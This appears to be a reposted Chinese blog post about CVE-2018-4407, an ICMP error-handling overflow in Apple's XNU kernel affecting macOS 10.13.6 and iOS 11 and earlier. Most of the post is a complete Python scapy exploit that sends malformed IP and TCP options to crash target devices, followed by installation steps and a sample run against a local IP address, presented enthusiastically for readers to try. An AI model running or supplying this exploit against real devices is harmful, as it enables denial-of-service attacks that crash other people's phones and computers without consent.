2018-10-30 公開了一個 Apple 設(shè)備的遠程代碼執(zhí)行漏洞 CVE-2018-4407，該漏洞是收到畸形數(shù)據(jù)包后，向發(fā)送方報告錯誤，在構(gòu)造 ICMP 數(shù)據(jù)包時發(fā)生了溢出，影響 macOS 10.13.6 及以下版本，iOS 11 及以下版本

python exp，能夠造成讓系統(tǒng)崩潰，代碼如下：

# CVE-2018-4407 ICMP DOS # https://lgtm.com/blog/apple_xnu_icmp_error_CVE-2018-4407 # from https://twitter.com/ihackbanme import sys try:from scapy.all import * except Exception as e:print ("[*] You need install scapy first:\n[*] sudo pip install scapy ") if __name__ == '__main__':try:check_ip = sys.argv[1]print ("[*] !!!!!!Dangerous operation!!!!!!")print ("[*] Trying CVE-2018-4407 ICMP DOS " + check_ip)for i in range(8,20):send(IP(dst=check_ip,options=[IPOption("A"*i)])/TCP(dport=2323,options=[(19, "1"*18),(19, "2"*18)]))print ("[*] Check Over!! ")except Exception as e:print "[*] usage: sudo python check_icmp_dos.py 127.0.0.1"

測試 exp 之前安裝一下 scapy

sudo pip install scapy

然后開始見證奇跡：

$ sudo python ./icmp_ddos.py 192.168.2.238 Fontconfig warning: ignoring UTF-8: not a valid region tag Fontconfig warning: ignoring UTF-8: not a valid region tag [*] !!!!!!Dangerous operation!!!!!! [*] Trying CVE-2018-4407 ICMP DOS 192.168.2.238 . Sent 1 packets. . Sent 1 packets. . Sent 1 packets. . Sent 1 packets. . Sent 1 packets. . Sent 1 packets. . Sent 1 packets. . Sent 1 packets. . Sent 1 packets. . Sent 1 packets. . Sent 1 packets. . Sent 1 packets. [*] Check Over!!

原文地址：https://www.exchen.net/apple_xnu_icmp_error_cve-2018-4407.html

總結(jié)

以上是生活随笔為你收集整理的CVE-2018-4407 苹果设备远程溢出漏洞的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。